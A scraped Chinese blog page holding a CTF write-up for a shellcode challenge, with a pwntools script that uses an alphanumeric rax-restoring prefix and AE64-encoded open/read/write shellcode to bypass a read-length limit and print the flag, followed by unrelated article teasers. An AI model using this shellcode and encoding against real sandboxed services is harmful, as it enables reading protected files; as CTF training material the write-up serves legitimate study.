需要注意ae64生成时的参数传递,其中rax为指定的与当前下一条指令执行时与rip值相等的寄存器。而由于在shellcode执行前,寄存器全部清零。因此我们需要先通过pop,push,xor操作恢复rax寄存器。

shellcode1 = b'hHHHHX5sHkh'

经过计算,使用这个可见字符串即可。

图片

图片

然后就正常写orw的shellcode即可。其中read限制count为1字节,可以通过0x10000001绕过。Write正常写一个loop循环即可。

 


from pwn import *
from ae64 import AE64
context.arch='amd64'
r=process('./checkin-release')
# r=remote('8.130.35.16',58002)
elf=ELF('./checkin-release')
libc=elf.libc

r.recvuntil("Give me your shellcode: ")

shellcode1 = b'hHHHHX5sHkh'

shellcode2 = shellcraft.close(0)
shellcode2 += shellcraft.open('flag')
shellcode2 +='''
    xor rax,rax
    xor rdi,rdi
    mov rsi,0x20230f00
    mov rdx,0x100000001
    syscall
    loop:
    mov eax,1
    mov edi,1
    mov rdx,1
    syscall
    add rsi,1
    jmp loop
'''
# shellcode2 += shellcraft.read(0,0x20230f00,0x100000001)
# shellcode2 += shellcraft.write(1,0x20230f00,0x100000001)

obj = AE64()
shellcode = obj.encode(asm(shellcode2),'rax',0,'small')


gdb.attach(r)
r.send(shellcode1+shellcode)
r.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1337963.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

后端业务架构文档模板

文章目录 1 业务理解1.1 项目目标1.2 业务术语1.3 系统边界1.4 关键领域模型 2 系统架构图2.1 分层架构图2.2 系统链路图2.3 系统部署图 3 关键流程3.1 关键流程13.1.2 流程简述3.1.2 业务流程图3.1.3 安全性3.1.3.1 资金安全3.1.3.2 内容安全 3.1.4 稳定性3.1.4.1 接口依赖3.1…

Zookeeper的使用场景

统一命名服务 利用ZooKeeper节点的树形分层结构和子节点的顺序维护能力&#xff0c;来为分布式系统中的资源命名。 例&#xff1a;分布式节点命名 分布式消息队列 1.在Zookeeper中创建一个持久节点&#xff0c;用作队列的根节点。队列元素的节点放在这个根节点下。 2.入队:…

【Linux学习笔记】Linux下nginx环境搭建

1、下载nginx 安装rpm命令: rpm ivh nginx-release.rpm。(直接使用linux命令下载wget http://nginx.org/packages/rhel/6/noarch/RPMS/nginx-release-rhel-6-0.el6.ngx.noarch.rpm 2、设置nginx开机启动 chkconfig nginx on 3、开启nginx服务 方法一&#xff1a;service nginx…

centos7 安装最新版jenkins; 安装jdk17 jenkins; 2024安装最新版jenkins; jenkins部署服务器启动失败

注意&#xff1a; java, maven配置&#xff0c;不再赘述&#xff0c;主要解决&#xff1a;配置端口&#xff0c;启动失败&#xff0c;问题 提供一个jdk下载网站&#xff1a; https://www.injdk.cn/ /etc/profile配置&#xff1a; MAVEN_HOME/home/maven export PATH$MAVEN_HO…

SEO网站分类完整指南

你知道吗&#xff0c;适当的网站分类结构对于良好的SEO很重要&#xff1f;在我们的最新指南中了解如何使用网站分类。 对于那些已经在SEO领域工作了一段时间的人来说&#xff0c;你可能听说过网站分类法&#xff0c;因为它指的是网站。 当您提到网站的结构以及用户浏览的难易…

k8s面试之——简述网络模型

kubernetes网络模型是kubernetes集群中管理容器网络通信的一种机制&#xff0c;用于实现pod间、pod与外部网络间的通信和互联&#xff0c;并提供了多种网络插件和配置选项来满足不同应用场景下的需求。kubernetes网络模型可以分为一下几个部分&#xff1a; 1. pod网络模型 在…

IntelliJ IDEA配置:过滤Project显示的文件类型

在IntelliJ IDEA-Settings-Editor-File Types界面设置&#xff0c;可设置识别的文件类型及忽略的文件类型&#xff0c;被识别的文件类型会展示在Project浏览窗口&#xff0c;忽略的文件类型不会展示在Project浏览窗口。

使用python netmiko模块批量配置Cisco、华为、H3C路由器交换机(支持 telnet 和 ssh 方式)

0. 当前环境 外网电脑Python版本&#xff1a;3.8.5&#xff08;安装后不要删除安装包&#xff0c;以后卸载的时候用这个&#xff09;外网电脑安装netmiko第三方库&#xff1a;cmd中输入pip install netmiko内网电脑环境&#xff1a;无法搭建python环境&#xff0c;需外网电脑完…

【kafka消息里会有乱序消费的情况吗?如果有,是怎么解决的?】

文章目录 什么是消息乱序消费了&#xff1f;顺序生产&#xff0c;顺序存储&#xff0c;顺序消费如何解决乱序数据库乐观锁是怎么解决这个乱序问题吗 保证消息顺序消费两种方案固定分区方案乐观锁实现方案 前几天刷着视频看见评论区有大佬问了这个问题&#xff1a;你们的kafka消…

Bug:Too many open files【ulimit限制】

Bug&#xff1a;Too many open files 今天在开发某个下载功能时&#xff0c;发现文件总是下载到250多个程序就挂掉&#xff0c;同时会打崩服务器&#xff0c;查看错误日志发现报&#xff1a;too many open files. 思路&#xff1a;根据错误信息可以知道打开的文件数过多&#x…

【滑动窗口】【map】LeetCode:76最小覆盖子串

作者推荐 【二叉树】【单调双向队列】LeetCode239:滑动窗口最大值 本文涉及知识点 滑动窗口 题目 给你一个字符串 s 、一个字符串 t 。返回 s 中涵盖 t 所有字符的最小子串。如果 s 中不存在涵盖 t 所有字符的子串&#xff0c;则返回空字符串 “” 。 注意&#xff1a; 对…

【工具】windeployqt 在windows + vscode环境下打包

目录 0.背景简介 1.windeployqt简介 2.打包具体过程 1&#xff09;用vscode编译&#xff0c;生成Release文件夹&#xff08;也有Debug文件夹&#xff0c;但是发布版本一般都是用Release&#xff09; 2&#xff09;此时可以看下Release文件夹内&#xff0c;一般是.exe可执行…

PYTHON基础:最小二乘法

最小二乘法的拟合 最小二乘法是一种常用的统计学方法&#xff0c;用于通过在数据点中找到一条直线或曲线&#xff0c;使得这条直线或曲线与所有数据点的距离平方和最小化。在线性回归中&#xff0c;最小二乘法被广泛应用于拟合一条直线与数据点之间的关系。 对于线性回归&…

OSPF多区域配置-新版(12)

目录 整体拓扑 操作步骤 1.基本配置 1.1 配置R1的IP 1.2 配置R2的IP 1.3 配置R3的IP 1.4 配置R4的IP 1.5 配置R5的IP 1.6 配置R6的IP 1.7 配置PC-1的IP地址 1.8 配置PC-2的IP地址 1.9 配置PC-3的IP地址 1.10 配置PC-4的IP地址 1.11 检测R5与PC1连通性 1.12 检测…

C# WPF上位机开发(扩展上位机之外的技能)

【 声明&#xff1a;版权所有&#xff0c;欢迎转载&#xff0c;请勿用于商业用途。 联系信箱&#xff1a;feixiaoxing 163.com】 如果把c# wpf只是看成是一个做界面的框架&#xff0c;那确实有点狭隘了。单独的上位机软件&#xff0c;如果不需要上下游的支持&#xff0c;没有与…

vue3+ts 可视化大屏无限滚动table效果实现

注意&#xff1a;vue3版本需使用 vue3-seamless-scroll npm npm install vue3-seamless-scroll --save页面引入 TS import { Vue3SeamlessScroll } from "vue3-seamless-scroll";代码使用&#xff08;相关参数可参考&#xff1a;https://www.npmjs.com/package/vu…

Unity与Android交互通信系列(3)

在上两篇文章中&#xff0c;我们已经能够通过直接使用Java&#xff0c;或者通过AndroidJavaClass、AndroidJavaObject这两个类实现在Unity端和Android原生端的通信。这已经可以解决很多问题&#xff0c;但这种方式不够模块化&#xff0c;不够优雅。 在实际使用中&#xff0c;将…

【宇宙猜想】AR文创入驻今日美术馆、北京天文馆等众多展馆,在AR互动中感受科技魅力!

近日&#xff0c;由「宇宙猜想」推出的AR系列文创产品先后入驻今日美术馆、北京天文馆、国家自然博物馆、上海天文馆、国家海洋馆、中华手工展馆等各大馆场并与其展开相关合作。 「宇宙猜想」致力于创造虚拟空间价值&#xff0c;用AR技术与文创产品碰撞出新的火花&#xff0c;为…

Qt Designer 常见需求

窗口 参考链接 【转载】Qt Designer 使用全攻略_qtdesigner使用-CSDN博客 QT屏幕自适应自动布局&#xff0c;拖动窗口自动变大变小&#xff08;一&#xff09;_qt布局随窗口大小变化-CSDN博客 pyqt5设置高分辨率以及icon显示模糊解决办法_python qt图显示不清晰-CSDN博客 窗…

RHCE9学习指南 第11章 网络配置

11.1 网络基础知识 一台主机需要配置必要的网络信息&#xff0c;才可以连接到互联网。需要的配置网络信息包括IP&#xff0c;子网掩码&#xff0c;网关和DNS。 11.1.1 IP地址 在计算机中对IP的标记使用的是32bit的二进制&#xff0c;例如&#xff0c; 11000000 10101000 00…